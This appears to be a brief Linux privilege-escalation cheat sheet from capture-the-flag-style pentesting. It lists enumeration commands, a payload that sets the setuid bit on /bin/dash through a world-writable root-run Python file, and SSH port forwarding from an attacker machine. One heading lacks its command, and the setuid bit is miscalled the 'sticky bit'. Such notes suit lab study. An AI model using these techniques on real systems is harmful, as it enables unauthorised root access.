Linux Priv Esc
Tools and commands for an initial post exploitation recon
Last updated
Tools and commands for an initial post exploitation recon
Last updated
Useful Priv esc enumeration scripts
LinEnum.sh
linux-exploit-suggester
linuxprivchecker.py
unixprivesc.sh
For see the procs running:
Check the version of installed software
dpkg -s <program name>
A way to enumerate users, groups, files, and permissions
find /home -printf "%f\t%p\t%u\t%g\t%m\n" 2>/dev/null |column -t
.bash_logout /home/george/.bash_logout george george 644
.bashrc /home/george/.bashrc george george 644
torrenthoster.zip /home/george/torrenthoster.zip george george 644
motd.legal-displayed /home/george/.cache/motd.legal-displayed george george 644
.sudo_as_admin_successful /home/george/.sudo_as_admin_successful george george 644
user.txt /home/george/user.txt george george 644
.nano_history /home/george/.nano_history root root 600
.mysql_history /home/george/.mysql_history root root 600
.bash_history /home/george/.bash_history root root 600
.profile /home/george/.profile george george 644
Look for a specific package installed a system
dpkg -l |grep -i <package>
Look for set UID files
find / -perm -4000 2>/dev/null
World writable python file ran as root (SUID) - dash priv esc
os.system('chmod 4755 /bin/dash')
with the sticky bit set on /bin/dash, type dash
running the id will show that our euid (effective uid) is now root
we are now able to run commands as root
Find which ports a server is listening on
netstat -an |grep LIST
Check if ASLR is enabled
cat /proc/sys/kernel/randomize_va_space 0
0 -> means that ASLR is disabled. 1 -> means that it is enabled
Check for Locally running services and port forward them to our machine
netstat -natp |grep 127.0.0.1
run this on the target linux box
Port forwarding local ports to attacker machine
ssh -L 52846:127.0.0.1:52846 jimmy@10.10.10.171
run this command from your attacker machine
then check the local port in your web browser on your attacker machine
e.g. 127.0.0.1:52846/
